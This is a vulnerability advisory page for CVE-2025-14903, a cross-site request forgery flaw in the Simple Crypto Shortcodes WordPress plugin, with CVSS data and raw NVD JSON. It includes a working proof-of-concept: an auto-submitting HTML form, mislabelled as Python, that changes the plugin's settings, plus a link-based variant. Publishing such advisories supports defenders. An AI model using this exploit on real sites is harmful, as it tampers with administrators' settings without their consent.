Security Vulnerability Report
中文
CVE-2025-14903 CVSS 4.3 MEDIUM

CVE-2025-14903

Published: 2026-01-24 08:16:06
Last Modified: 2026-04-15 00:35:42

Description

The Simple Crypto Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.2. This is due to missing nonce validation on the scs_backend function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple Crypto Shortcodes <= 1.0.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-14903 --> <!-- Exploits missing nonce validation in scs_backend function --> <!DOCTYPE html> <html> <head> <title>CVE-2025-14903 PoC</title> </head> <body> <h1>CSRF Attack - Update Plugin Settings</h1> <p>This PoC exploits the CSRF vulnerability in Simple Crypto Shortcodes <= 1.0.2</p> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST"> <!-- Required parameters for scs_backend function --> <input type="hidden" name="action" value="scs_backend"> <input type="hidden" name="scs_api_key" value="attacker_controlled_api_key"> <input type="hidden" name="scs_currency" value="BTC"> <input type="hidden" name="scs_display_options" value="malicious_option"> <!-- Additional plugin settings can be modified here --> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If settings were updated successfully, the attack worked.</p> <p>Note: Requires logged-in WordPress admin to visit this page.</p> </body> </html> <!-- Alternative: Direct link-based PoC --> <!-- http://target-site.com/wp-admin/admin-post.php?action=scs_backend&scs_api_key=malicious_key -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14903", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:06.243", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple Crypto Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.2. This is due to missing nonce validation on the scs_backend function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Simple Crypto Shortcodes para WordPress es vulnerable a falsificación de petición en sitios cruzados en versiones hasta la 1.0.2, inclusive. Esto se debe a la falta de validación de nonce en la función scs_backend. Esto hace posible que atacantes no autenticados actualicen la configuración del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simple-crypto-shortcodes/tags/1.0.2/simple_crypto_shortcodes.php#L46", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simple-crypto-shortcodes/tags/1.0.2/simple_crypto_shortcodes.php#L54", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/18bcd2ad-1989-4e2b-b82e-fddc4201c5a6?source=cve", "source": "[email protected]"}]}}